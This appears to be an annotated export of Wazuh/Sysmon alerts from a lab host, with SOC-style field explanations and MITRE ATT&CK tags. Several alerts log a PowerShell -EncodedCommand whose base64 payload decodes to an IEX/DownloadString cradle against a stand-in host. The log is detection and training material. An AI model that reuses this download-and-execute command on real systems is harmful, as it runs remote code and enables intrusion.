No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1a3-680a-010d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:44.337+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:44.337+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  137
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535404.2898927
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:41.7268408Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350944
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:41.676 ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ProcessId: 12292 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kteidnpa.tvp.ps1 CreationUtcTime: 2025-04-24 22:56:41.676 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:41.676
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a7-680a-040d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kteidnpa.tvp.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:41.676
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:47.956+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:47.956+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  134
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535407.2901696
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:45.6413370Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350971
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:42.931 ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} ProcessId: 10312 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ParentProcessId: 12292 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:42.931
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1aa-680a-060d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10312
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1a7-680a-040d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:47.967+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:47.967+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  138
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535407.2909767
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:45.8540677Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350972
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:45.841 ProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} ProcessId: 10312 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zaf4aluj.1ni.ps1 CreationUtcTime: 2025-04-24 22:56:45.841 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:45.841
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1aa-680a-060d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10312
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zaf4aluj.1ni.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:45.841
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:50.628+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:50.628+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  135
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535410.2912536
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:48.8881088Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351005
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:47.245 ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} ProcessId: 11220 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} ParentProcessId: 10312 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:47.245
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1af-680a-080d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

